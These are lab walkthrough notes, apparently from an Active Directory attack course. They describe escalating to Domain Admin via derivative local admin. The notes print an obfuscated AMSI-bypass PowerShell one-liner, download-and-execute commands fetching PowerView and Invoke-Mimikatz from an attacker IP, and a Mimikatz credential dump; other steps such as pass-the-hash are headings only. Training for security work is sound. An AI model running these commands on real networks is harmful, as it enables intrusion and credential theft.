Obj 7 Derivative Local Admin
Task - Target a domain where a domain admin has a session and compromise the machine to escalate privs to Domain Admin.
Theses commands are going to be ran from the reverse shell on dcorp-ci
Run AMSI bypass on machine
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )Load PowerView onto the machine
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))Find Domain user location
Find-DomainUserLocation The above command finds active sessions of domain users. We are looking for a DA session if possible.
Check if we can run commands on the sessions available
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmtGet Mimikatz on the Target Machine
iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)Create a new session for Target Machine
Disable Protections and AMSI on Target Machine
Now we can Invoke Mimikatz on Target Machine to Get Creds
Now we can use Over Pass the Hash with Rubeus
We can use Rubeus, Mimikatz or SafteyKatz for this as well.
Rubeus Over Pass The Hash
Mimikatz Over Pass The Hash
SafetyKatz Over Pass The Hash
- DERIVATIVE LOCAL ADMIN -
In the session we created using svcadmin creds above we are going to see who we can access as local admin.
We can start a PSSession on any available machines we find
We need to check what language mode we are in first.
Next we can check the AppLocker policy to see if/where we can run scripts from
We can now disable Windows Defender and AMSI on the sess
Create a Modified Mimikatz script to execute on load
Now we can transfer the new file over
We are copying this from our foothold machine in the process created for svcadmin
Back on the Target Machine we can invoke Mimikatz
Over Pass the Hash with SafetyKatz
Again we can use SafetyKatz, Rubeus or Mimikatz to do this also. We will use one of the creds we found in the previous hash dump.
On the new process that started we run invishell and look for PSRemoting local admins again.
Extract credentials from our findings Using SafetyKatz
We can use mimikatz to do this but this time we are going to use safetykatz. So we need to copy loader.exe to the target machine first.
We can now winrs or PSRemote in and Invoke SafetyKatz
We can do the same as above with Mimikatz do dump the credentials of the target machine
First we need to disable AMSI on the target machine (copy and past AMSI Bypass)
Download and Execute Mimikatz.ps1
iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)On Target machine run:
Invoke-Mimikatz–Command '"sekurlsa::ekeys"'
We can also dump credentials from the credentials vault with mimikatz
Finally we can use Over Pass the Hash with svcadmin credentials to start a new process as Domain Admin
Last updated